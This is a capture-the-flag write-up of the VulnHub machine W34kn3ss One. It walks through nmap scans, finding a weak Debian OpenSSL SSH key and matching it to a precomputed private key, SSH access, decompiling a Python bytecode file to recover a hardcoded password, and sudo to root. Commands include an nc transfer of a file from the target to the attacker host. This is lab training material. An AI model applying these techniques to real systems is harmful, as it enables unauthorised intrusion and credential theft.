W34kn3ss One – Writeup

Details

This machine is W34kn3ss One from vulnhub available at https://www.vulnhub.com/entry/w34kn3ss-1,270/

Recon

I started by finding where it was on the network

root@kali:~# nmap -T4 -sn 192.168.56.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-23 16:33 GMT
Nmap scan report for 192.168.56.1
Host is up (0.00022s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00023s latency).
MAC Address: 08:00:27:A6:DA:60 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00044s latency).
MAC Address: 08:00:27:10:48:F5 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.08 seconds

Then checked for services

root@kali:~# nmap -T4 -sV 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00017s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 08:00:27:10:48:F5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.24 seconds

And then let it run some scripts

root@kali:~# nmap -T4 -sVC 192.168.56.102
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-23 17:39 GMT
Nmap scan report for 192.168.56.102
Host is up (0.00012s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 de:89:a2:de:45:e7:d6:3d:ef:e9:bd:b4:b6:68:ca:6d (RSA)
|   256 1d:98:4a:db:a2:e0:cc:68:38:93:d0:52:2a:1a:aa:96 (ECDSA)
|_  256 3d:8a:6b:92:0d:ba:37:82:9e:c3:27:18:b6:01:cd:98 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=weakness.jth/organizationName=weakness.jth/stateOrProvinceName=Jordan/countryName=jo
| Not valid before: 2018-05-05T11:12:54
|_Not valid after:  2019-05-05T11:12:54
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|   http/1.1
[SNIP]
|_  http/1.1
MAC Address: 08:00:27:10:48:F5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.59 seconds

Shell Hunting

I started by checking the webserver on port 80 at http://192.168.56.102/

Screenshot 1

Then the ssl one at https://192.168.56.102/

Screenshot 2

And setup dirbuster against port 80

Screenshot 3

Screenshot 4

Then checked out the blog

Screenshot 5

No luck there, what about test

Screenshot 6

Keys being referenced instantly had me thinking ssh keys but no sign of them here, so I moved onto uploads

Screenshot 7

And then uploads.php

Screenshot 8

I tried to upload a test file

Screenshot 9

The base64 decoded to

WE JUST TEST THIS SCRIPTWE JUST TEST THIS SCRIPT AGAIN :D

And in the source

Screenshot 10

I checked to see if the upload worked, but no luck. Probably a fake script. So I went back to the image on /test and downloaded it for inspection

root@kali:~# strings keys2.jpg
JFIF
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
    #3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
sa,+u
[SNIP]

This looked like steghide, but I couldn't work out a passphrase for it, my next option was nmap had shown a potential domain at weakness.jth so I added it to hosts

root@kali:~# echo "192.168.56.102 weakness.jth" >> /etc/hosts

And then went to http://weakness.jth/

Screenshot 11

Here I setup dirbuster again

Screenshot 12

Screenshot 13

Go to private

Screenshot 14

And looked at the script at http://weakness.jth/private/assets/js/script.js

Screenshot 15

This revealed scap.php, so I went there

Screenshot 16

Which showed some files and a directory, to make sure I didn't miss files I went to the directory

Screenshot 17

I checked out note first

this key was generated by openssl 0.9.8c-1

And then the key

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster

A public ssh key, now the mentioned version of openssl suffers from CVE-2008-0166 which means the key could be weak, I combined this with https://www.exploit-db.com/exploits/5720 to move on, first saving the key as key.pub then downloading and extracting https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)

Now I could have used the provided script, but I already have a pub key, so by using grep I could look for a file containing the key, if it's there then I already have the private key

root@kali:~# grep -r -l "AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw==" ./
./4161de56829de2fe64b9055711f531c1-2537.pub

So I had the file containing the private key, I needed a username, eventually I tried n30 having found it in the ascii art back on the white rabbit page

root@kali:~# ssh n30@192.168.56.102 -i ./4161de56829de2fe64b9055711f531c1-2537
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Tue Aug 14 13:29:20 2018 from 192.168.209.1
n30@W34KN3SS:~$

I now have a shell and can hunt for root

Root Time

So I began to look round

n30@W34KN3SS:~$ ls -la
drwxr-xr-x 5 n30  n30  4096 Aug 14  2018 .
drwxr-xr-x 3 root root 4096 May  5  2018 ..
-rw------- 1 n30  n30    25 Aug 14  2018 .bash_history
-rw-r--r-- 1 n30  n30   220 May  5  2018 .bash_logout
-rw-r--r-- 1 n30  n30  3771 May  5  2018 .bashrc
drwx------ 2 n30  n30  4096 May  5  2018 .cache
-rwxrwxr-x 1 n30  n30  1138 May  8  2018 code
drwxrwxr-x 3 n30  n30  4096 May  5  2018 .local
-rw-r--r-- 1 n30  n30   818 May  7  2018 .profile
drwxrwxr-x 2 n30  n30  4096 May  5  2018 .ssh
-rw-r--r-- 1 n30  n30     0 May  5  2018 .sudo_as_admin_successful
-rw-rw-r-- 1 n30  n30    33 May  8  2018 user.txt

Might as well grab the user flag then

n30@W34KN3SS:~$ cat user.txt
25e3cd678875b601425c9356c8039f68

But the code file looks interesting

n30@W34KN3SS:~$ file code
code: python 2.7 byte-compiled

What if I run it

n30@W34KN3SS:~$ python ./code
[+]System Started at : Sat Feb 23 21:17:06 2019
[+]This binary should generate unique hash for the hardcoded login info
[+]Generating the hash ..
[+]Your new hash is : 69e0e72f3d489f6a3df9ce16fcdf06e5916f14fc895a08c90b43c70484f94413
[+]Done

I wanted to extract this so I could see exactly what it did

root@kali:~# nc -nlvp 2222 > code.pyc
n30@W34KN3SS:~$ nc 192.168.56.101 2222 < code

Then used https://pypi.org/project/uncompyle6/ to decompile it

root@kali:~# uncompyle6 code.pyc
# uncompyle6 version 3.2.5
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15+ (default, Nov 28 2018, 16:27:22)
# [GCC 8.2.0]
# Embedded file name: code.py
# Compiled at: 2018-05-08 16:50:54
import os, socket, time, hashlib
print ('[+]System Started at : {0}').format(time.ctime())
print '[+]This binary should generate unique hash for the hardcoded login info'
print '[+]Generating the hash ..'
inf = ''
inf += chr(ord('n'))
inf += chr(ord('3'))
inf += chr(ord('0'))
inf += chr(ord(':'))
inf += chr(ord('d'))
inf += chr(ord('M'))
inf += chr(ord('A'))
inf += chr(ord('S'))
inf += chr(ord('D'))
inf += chr(ord('N'))
inf += chr(ord('B'))
inf += chr(ord('!'))
inf += chr(ord('!'))
inf += chr(ord('#'))
inf += chr(ord('B'))
inf += chr(ord('!'))
inf += chr(ord('#'))
inf += chr(ord('!'))
inf += chr(ord('#'))
inf += chr(ord('3'))
inf += chr(ord('3'))
hashf = hashlib.sha256(inf + time.ctime()).hexdigest()
print ('[+]Your new hash is : {0}').format(hashf)
print '[+]Done'
# okay decompiling code.pyc

So the original text was

n30:dMASDNB!!#B!#!#33

So the password should be

dMASDNB!!#B!#!#33

I'll try it in sudo

n30@W34KN3SS:~$ sudo -l
[sudo] password for n30:
Matching Defaults entries for n30 on W34KN3SS:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User n30 may run the following commands on W34KN3SS:
    (ALL : ALL) ALL

I can simply use sudo to spawn a root shell

n30@W34KN3SS:~$ sudo /bin/sh
#
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -la
drwx------  4 root root 4096 Aug 14  2018 .
drwxr-xr-x 22 root root 4096 May  5  2018 ..
-rw-------  1 root root    6 Aug 14  2018 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 Aug 14  2018 .cache
drwxr-xr-x  3 root root 4096 May  5  2018 .local
-rw-------  1 root root  114 May  5  2018 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root 1024 May  5  2018 .rnd
-rw-r--r--  1 root root   33 May  8  2018 root.txt
-rw-r--r--  1 root root   66 Aug 14  2018 .selected_editor

And get my flag

# cat root.txt
a1d2fab76ec6af9b651d4053171e042e

A nice machine, never did find out if the keys2.jpg file had steghide on it, might come back and try and break it later!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.